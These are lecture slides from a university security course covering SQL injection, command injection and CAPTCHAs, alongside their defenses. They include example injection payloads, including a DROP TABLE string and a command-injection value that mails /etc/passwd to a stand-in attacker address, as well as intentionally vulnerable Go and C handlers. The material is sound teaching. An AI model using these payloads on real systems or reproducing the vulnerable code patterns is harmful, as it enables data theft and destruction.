SQL Injection and CAPTCHAs

CS 161 Fall 2022 - Lecture 15

Computer Science 161

Fall 2022

Last Time: XSS

• Websites use untrusted content as control data
• <html><body>Hello EvanBot!</body></html>
• <html><body>Hello <script>alert(1)</script>!</body></html>
• Stored XSS
• The attacker’s JavaScript is stored on the legitimate server and sent to browsers
• Classic example: Make a post on a social media site (e.g. Facebook) with JavaScript
• Reflected XSS
• The attacker causes the victim to input JavaScript into a request, and the content it’s reflected (copied) in the response from the server
• Classic example: Create a link for a search engine (e.g. Google) query with JavaScript
• Requires the victim to click on the link with JavaScript

2

Computer Science 161

Fall 2022

Last Time: XSS Defenses

• Defense: HTML sanitization
• Replace control characters with data sequences
• < becomes &lt;
• " becomes &quot;
• Use a trusted library to sanitize inputs for you
• Defense: Templates
• Library creates the HTML based on a template and automatically handles all sanitization
• Defense: Content Security Policy (CSP)
• Instruct the browser to only use resources loaded from specific places
• Limits JavaScript: only scripts from trusted sources are run in the browser
• Enforced by the browser

3

Computer Science 161

Fall 2022

Last Time: Clickjacking

• Clickjacking: Trick the victim into clicking on something from the attacker
• Main vulnerability: the browser trusts the user’s clicks
• When the user clicks on something, the browser assumes the user intended to click there
• Examples
• Fake download buttons
• Show the user one frame, when they’re actually clicking on another invisible frame
• Temporal attack: Change the cursor just before the user clicks
• Cursorjacking: Create a fake mouse cursor with JavaScript
• Defenses
• Enforce visual integrity: Focus the user’s vision on the relevant part of the screen
• Enforce temporal integrity: Give the user time to understand what they’re clicking on
• Ask the user for confirmation
• Frame-busting: The legitimate website forbids other websites from embedding it in an iframe

4

Computer Science 161

Fall 2022

Last Time: Phishing

• Phishing: Trick the victim into sending the attacker personal information
• A malicious website impersonates a legitimate website to trick the user
• Don’t blame the users
• Detecting phishing is hard, especially if you aren’t a security expert
• Check the URL? Still vulnerable to homograph attacks (malicious URLs that look legitimate)
• Check the entire browser? Still vulnerable to browser-in-browser attacks
• Defense: Two-Factor Authentication (2FA)
• User must prove their identity two different ways (something you know, something you own, something you are)
• Defends against attacks where an attacker has only stolen one factor (e.g. the password)
• Vulnerable to relay attacks: The attacker phishes the victim into giving up both factors
• Vulnerable to social engineering attacks: Trick humans to subvert 2FA
• Example: Authentication tokens for generating secure two-factor codes
• Example: Security keys to prevent phishing

5

Computer Science 161

Fall 2022

Today: SQL Injection and CAPTCHAS

• Structure of modern web services
• SQL injection
• Defenses
• Command injection
• Defenses
• CAPTCHAs
• Subverting CAPTCHAs

6

Computer Science 161

Fall 2022

SQL Injection

7

Textbook Chapter 17

Computer Science 161

Fall 2022

Top 25 Most Dangerous Software Weaknesses (2020)

8

Computer Science 161

Fall 2022

Structure of Web Services

• Most websites need to store and retrieve data
• Examples: User accounts, comments, prices, etc.
• The HTTP server only handles the HTTP requests, and it needs to have some way of storing and retrieving persisted data

9

Computer Science 161

Fall 2022

Structure of Web Services

10

3. Interpret request

6. Construct response

1. User requests page

8. Browser renders page

Computer Science 161

Fall 2022

Databases

• For this class, we will cover SQL databases
• SQL = Structured Query Language
• Each database has a number of tables
• Each table has a predefined structure, so it has columns for each field and rows for each entry
• Database server manages access and storage of these databases

11

Computer Science 161

Fall 2022

SQL

• Structured Query Language (SQL): The language used to interact with and manage data stored in a database
• Defined by the International Organization for Standardization (ISO) and implemented by many SQL servers
• Good SQL servers are ACID (atomicity, consistency, isolation, and durability)
• Essentially ensures that the database will never store a partial operation, return an invalid state, or be vulnerable to race conditions
• Declarative programming language, rather than imperative
• Declarative: Use code to define the result you want
• Imperative: Use code to define exactly what to do (e.g. C, Python, Go)

12

Computer Science 161

Fall 2022

SQL: SELECT

• SELECT is used to select some columns from a table
• Syntax:�SELECT [columns] FROM [table]

13

Computer Science 161

Fall 2022

SQL: SELECT

SELECT name, age FROM bots

14

Selected 2 columns from the table, keeping all rows.

Computer Science 161

Fall 2022

SQL: SELECT

SELECT * FROM bots

15

The asterisk (*) is shorthand for “all columns.” Select all columns from the table, keeping all rows.

Computer Science 161

Fall 2022

SQL: SELECT

SELECT 'CS', '161' FROM bots

16

Select constants instead of columns

Computer Science 161

Fall 2022

SQL: WHERE

• WHERE can be used to filter out certain rows
• Arithmetic comparison: <, <=, >, >=, =, <>
• Arithmetic operators: +, - , * , /
• Boolean operators: AND, OR
• AND has precedence over OR

17

Computer Science 161

Fall 2022

SQL: WHERE

SELECT * FROM bots�WHERE likes = 'pancakes'

18

Choose only the rows where the likes column has value pancakes

Computer Science 161

Fall 2022

SQL: WHERE

SELECT name FROM bots�WHERE age < 2 OR id = 1

19

Get all names of bots whose age is less than 2 or whose id is 1

(selected because id is 1)

(selected because age is 1.5)

Computer Science 161

Fall 2022

SQL: INSERT INTO

• INSERT INTO is used to add rows into a table
• VALUES is used for defining constant rows and columns, usually to be inserted

20

Computer Science 161

Fall 2022

SQL: INSERT INTO

INSERT INTO items VALUES�(4, 'willow', 'catnip', 5),�(5, 'luna', 'naps', 7)

21

Computer Science 161

Fall 2022

SQL: UPDATE

• UPDATE is used to change the values of existing rows in a table
• Followed by SET after the table name
• Usually combined with WHERE
• Syntax:�UPDATE [table]�SET [column] = [value]�WHERE [condition]

22

Computer Science 161

Fall 2022

SQL: UPDATE

UPDATE bots�SET age = 6�WHERE name = 'willow'

23

Computer Science 161

Fall 2022

SQL: DELETE

• DELETE FROM is used to delete rows from a table
• Usually combined with WHERE
• Syntax:�DELETE FROM [table]�WHERE [condition]

24

Computer Science 161

Fall 2022

SQL: DELETE

DELETE FROM bots�WHERE age >= 6

25

Computer Science 161

Fall 2022

SQL: CREATE

• CREATE is used to create tables (and sometimes databases)

26

Computer Science 161

Fall 2022

SQL: CREATE

CREATE TABLE cats (� id INT,� name VARCHAR(255),� likes VARCHAR(255),� age INT�)

27

Note: VARCHAR(255) is a string type

Computer Science 161

Fall 2022

SQL: DROP

• DROP is used to delete tables (and sometimes databases)
• Syntax:�DROP TABLE [table]

28

Computer Science 161

Fall 2022

SQL: DROP

DROP TABLE bots

29

Computer Science 161

Fall 2022

SQL: Syntax Characters

• -- (two dashes) is used for single-line comments (like # in Python or // in C)
• Semicolons separate different statements
• UPDATE items SET price = 2 WHERE id = 4;�SELECT price FROM items WHERE id = 4
• Returns a single column with a row 2 only if there already exists a row with ID 4
• SQL is really complicated, but you only need to know the basics for this class

30

Computer Science 161

Fall 2022

A Go HTTP Handler (Again)

31

func handleGetItems(w http.ResponseWriter, r *http.Request) {

itemName := r.URL.Query()["item"][0]

db := getDB()

query := fmt.Sprintf("SELECT name, price FROM items WHERE name = '%s'", itemName)

row, err := db.QueryRow(query)

...

}

SELECT item, price FROM items WHERE name = 'paperclips'

https://vulnerable.com/get-items?item=paperclips

Handler

URL

Query

Computer Science 161

Fall 2022

A Go HTTP Handler (Again)

32

func handleGetItems(w http.ResponseWriter, r *http.Request) {

itemName := r.URL.Query()["item"][0]

db := getDB()

query := fmt.Sprintf("SELECT name, price FROM items WHERE name = '%s'", itemName)

row, err := db.QueryRow(query)

...

}

SELECT item, price FROM items WHERE name = '''

https://vulnerable.com/get-items?item='

Handler

URL

Query

Computer Science 161

Fall 2022

A Go HTTP Handler (Again)

33

func handleGetItems(w http.ResponseWriter, r *http.Request) {

itemName := r.URL.Query()["item"][0]

db := getDB()

query := fmt.Sprintf("SELECT name, price FROM items WHERE name = '%s'", itemName)

row, err := db.QueryRow(query)

...

}

SELECT item, price FROM items WHERE name = '' OR '1' = '1'

https://vulnerable.com/get-items?item=' OR '1' = '1

Handler

URL

Query

Computer Science 161

Fall 2022

A Go HTTP Handler (Again)

34

func handleGetItems(w http.ResponseWriter, r *http.Request) {

itemName := r.URL.Query()["item"][0]

db := getDB()

query := fmt.Sprintf("SELECT name, price FROM items WHERE name = '%s'", itemName)

row, err := db.QueryRow(query)

...

}

SELECT item, price FROM items WHERE name = ''; DROP TABLE items --'

https://vulnerable.com/get-items?item='; DROP TABLE items --

Handler

URL

Query

Computer Science 161

Fall 2022

SQL Injection

• SQL injection (SQLi): Injecting SQL into queries constructed by the server to cause malicious behavior
• Typically caused by using vulnerable string manipulation for SQL queries
• Allows the attacker to execute arbitrary SQL on the SQL server!
• Leak data
• Add records
• Modify records
• Delete records/tables
• Basically anything that the SQL server can do

35

Computer Science 161

Fall 2022

Exploits of a Mom

36

Computer Science 161

Fall 2022

Roadside SQLi

37

Computer Science 161

Fall 2022

Blind SQL Injection

• Not all SQL queries are used in a way that is visible to the user
• Visible: Shopping carts, comment threads, list of accounts
• Blind: Password verification, user account creation
• Some SQL injection vulnerabilities only return a true/false as a way of determining whether your exploit worked!
• Blind SQL injection: SQL injection attacks where little to no feedback is provided
• Attacks become more annoying, but vulnerabilities are still exploitable
• Automated SQL injection detection and exploitation makes this less of an issue
• Attackers will use automated tools

38

Computer Science 161

Fall 2022

Blind SQL Injection Tools

• sqlmap: An automated tool to find and exploit SQL injection vulnerabilities on web servers
• Supports pretty much all database systems
• Supports blind SQL injection (even through timing side channels)
• Supports “escaping” from the database server to run commands in the operating system itself
• Takeaway: “Harder” is harder only until someone makes a tool to automate the attack

39

Computer Science 161

Fall 2022

SQL Injection Defenses

• Defense: Input sanitization
• Option #1: Disallow special characters
• Option #2: Escape special characters
• Like XSS, SQL injection relies on certain characters that are interpreted specially
• SQL allows special characters to be escaped with backslash (\) to be treated as data
• Drawback: Difficult to build a good escaper that handles all edge cases
• You should never try to build one yourself!
• Good as a defense-in-depth measure

40

func handleGetItems(w http.ResponseWriter, r *http.Request) {

itemName := r.URL.Query()["item"][0]

itemName = sqlEscape(itemName)

db := getDB()

query := fmt.Sprintf("SELECT name, price FROM items WHERE name = '%s'", itemName)

row, err := db.QueryRow(query)

...

}

Computer Science 161

Fall 2022

SQL Injection Defenses

• Defense: Prepared statements
• Usually represented as a question mark (?) when writing SQL statements
• Idea: Instead of trying to escape characters before parsing, parse the SQL first, then insert the data
• When the parser encounters the ?, it fixes it as a single node in the syntax tree
• After parsing, only then, it inserts data
• The untrusted input never has a chance to be parsed, only ever treated as data

41

func handleGetItems(w http.ResponseWriter, r *http.Request) {

itemName := r.URL.Query()["item"][0]

db := getDB()

row, err := db.QueryRow("SELECT name, price FROM items WHERE name = ?", itemName)

...

}

Computer Science 161

Fall 2022

SQL Injection Defenses

• Biggest downside to prepared statements: Not part of the SQL standard!
• Instead, SQL drivers rely on the actual SQL implementation (e.g. MySQL, PostgreSQL, etc.) to implement prepared statements
• Must rely on the API to correctly convert the prepared statement into implementation-specific protocol
• Again: Consider human factors!

42

Computer Science 161

Fall 2022

Command Injection

43

Computer Science 161

Fall 2022

Command Injection

• Untrusted data being treated incorrectly is not a SQL-specific problem
• Can happen in other languages too
• Consider: system function in C
• The function takes a string as input, spawns a shell, and executes the string input as a command in the shell

44

Computer Science 161

Fall 2022

system Command Injection

45

void find_employee(char *regex) {

char cmd[512];

snprintf(cmd, sizeof cmd, "grep '%s' phonebook.txt", regex);

system(cmd);

}

grep 'weaver' phonebook.txt

regex = "weaver"

Handler

Parameter

system Command

Computer Science 161

Fall 2022

system Command Injection

46

void find_employee(char *regex) {

char cmd[512];

snprintf(cmd, sizeof cmd, "grep '%s' phonebook.txt", regex);

system(cmd);

}

grep ''; mail mallory@evil.com < /etc/passwd; touch '' phonebook.txt

regex = "'; mail mallory@evil.com < /etc/passwd; touch '"

Handler

Parameter

system Command

Computer Science 161

Fall 2022

Defending Against Command Injection in General

• Defense: Input sanitization
• As before, this is hard to implement and difficult to get 100% correct
• Defense: Use safe APIs
• In general, remember the KISS principle: Keep It Simple, Stupid
• For system, executing a shell to execute a command is too powerful!
• Instead, use execv, which directly executes the program with arguments without parsing
• Most programming languages have safe APIs that should be use instead of parsing untrusted input
• system (unsafe) and execv (safe) in C
• os.system (unsafe) and subprocess.run (safe) in Python
• exec.Command (safe) in Go
• Go only has the safe version!
• Say it with me: Consider human factors!

47

Computer Science 161

Fall 2022

CAPTCHAs

48

Computer Science 161

Fall 2022

Websites are for Humans

• Most websites are designed for human usage, not robot usage
• Example: A login page is for users to submit their password, not for an attacker to automate a brute-force attack
• Robot access of websites can lead to attacks
• Denial of service: Overwhelming a web server by flooding it with requests
• We’ll see more denial-of-service later in the networking unit
• Spam
• More specific exploitation (e.g. scalping tickets/graphics cards when they go on sale)

49

Computer Science 161

Fall 2022

CAPTCHAs: Definition

• CAPTCHA: A challenge that is easy for a human to solve, but hard for a computer to solve
• “Completely Automated Public Turing test to tell Computers and Humans Apart”
• Sometimes called a “reverse Turing test”
• Used to distinguish web requests made by humans and web requests made by robots
• Usage: Administer a CAPTCHA, and if it passes, assume that the user is human and allow access

50

Computer Science 161

Fall 2022

CAPTCHAs: Examples

• Reading distorted text
• Identifying images
• Listening to an audio clip and typing out the words spoken

51

Computer Science 161

Fall 2022

CAPTCHAs and Machine Learning

• Modern CAPTCHAs have another purpose: Training machine learning algorithms
• Machine learning often requires manually-labeled datasets
• CAPTCHAs crowdsource human power to help manually label these big datasets
• Example: Machine vision problems require manually-labeled examples: “This is a stop sign”

52

Computer Science 161

Fall 2022

CAPTCHAs and Machine Learning

53

Takeaway: Modern CAPTCHAs are used to train machine learning algorithms

Computer Science 161

Fall 2022

CAPTCHAs: Issues

• Arms race: As computer algorithms get smarter, CAPTCHAs need to get harder
• Accessibility: As CAPTCHAs get harder, not all humans are able to solve them easily
• Ambiguity: CAPTCHAs might be so hard that the validator doesn’t know the solution either!
• Not all bots are bad: CAPTCHAs can distinguish bots from humans, but not good bots from bad bots
• Example: Crawler bots help archive webpages

54

Computer Science 161

Fall 2022

CAPTCHAs: Attacks

• Outsourcing attack: Pay humans to solve CAPTCHAs for you
• CAPTCHAs only verify that there is a human in the loop; everything else can be automated
• Usually costs a few cents per CAPTCHA
• CAPTCHAs end up just distinguishing which attackers are willing to spend money
• Remember: Security is economics!

55

Computer Science 161

Fall 2022

SQL Injection: Summary

• Web servers interact with databases to store data
• Web servers use SQL to interact with databases
• SQL injection: Untrusted input is used as parsed SQL
• The attacker can construct their own queries to run on the SQL server!
• Blind SQL injection: SQLi with little to no feedback from the SQL query
• Defense: Input sanitization
• Difficult to implement correctly
• Defense: Prepared statements
• Data only ever treated as data; bulletproof!
• Command injection: Untrusted input is used as any parsed language
• Defense: Keep it simple and use safe API calls

56

Computer Science 161

Fall 2022

CAPTCHAs: Summary

• CAPTCHA: A challenge that is easy for a human to solve, but hard for a computer to solve
• Examples: Reading distorted text, identifying images
• Original purpose: Distinguishing between humans and bots
• Modern purpose: Forces the attacker to spend some money to solve the CAPTCHAs
• Modern purpose: Providing training data for machine learning algorithms
• Issues with CAPTCHAs
• As computer algorithms get smarter, CAPTCHAs get harder, and not all humans are able to solve them easily
• Ambiguity: CAPTCHAs might be so hard that the validator doesn't know the solution either!
• Economics: Breaking CAPTCHAs just costs money
• Not all bots are bad

57

Computer Science 161

Fall 2022

Optional Bonus Slides: SQL Injection Demo

58

Computer Science 161

Fall 2022

SQL injection step 1: what does the SQL interpreter see?

59

Computer Science 161

Fall 2022

SQL injection step 1: what does the SQL interpreter see?

60

> INSERT INTO cart (session, item)� VALUES ('____________', '____________')

​

sessionToken item

Computer Science 161

Fall 2022

SQLi Step 2: what do we want the SQL interpreter to see?

61

Computer Science 161

Fall 2022

SQLi Step 2: what do we want the SQL interpreter to see?

62

Computer Science 161

Fall 2022

SQLi Step 2: what do we want the SQL interpreter to see?

63

> INSERT INTO cart (session, item)� VALUES ('123', 'toilet paper'), ('123', 'toilet paper'),

('123', 'toilet paper'), ... ('123', 'toilet paper')

Computer Science 161

Fall 2022

SQL injection step 3: compare

The SQL interpreter sees:

​

> INSERT INTO cart (session, item)� VALUES ('____________', '____________')

​

sessionToken item

​

We want the SQL interpreter to see:�

> INSERT INTO cart (session, item)� VALUES ('123', 'toilet paper'), ('123', 'toilet paper'),

('123', 'toilet paper'), ... ('123', 'toilet paper')

Computer Science 161

Fall 2022

SQL injection step 3: compare

The SQL interpreter sees:

​

> INSERT INTO cart (session, item)� VALUES ('____________', '____________')

​

sessionToken item

​

We want the SQL interpreter to see:�

> INSERT INTO cart (session, item)� VALUES ('123', 'toilet paper'), ('123', 'toilet paper'),

('123', 'toilet paper'), ... ('123', 'toilet paper')

Computer Science 161

Fall 2022

SQL injection step 4: ??? step 5: profit

The SQL interpreter sees:

​

> INSERT INTO cart (session, item)� VALUES ('____________', '____________')

​

sessionToken item

​

We want the SQL interpreter to see:�

> INSERT INTO cart (session, item)� VALUES ('123', 'toilet paper'), ('123', 'toilet paper'),

('123', 'toilet paper'), ... ('123', 'toilet paper')

​

sessionToken = 123

item = toilet paper'), ('123', 'toilet paper'),

('123', 'toilet paper'), ... ('123', 'toilet paper

Computer Science 161

Fall 2022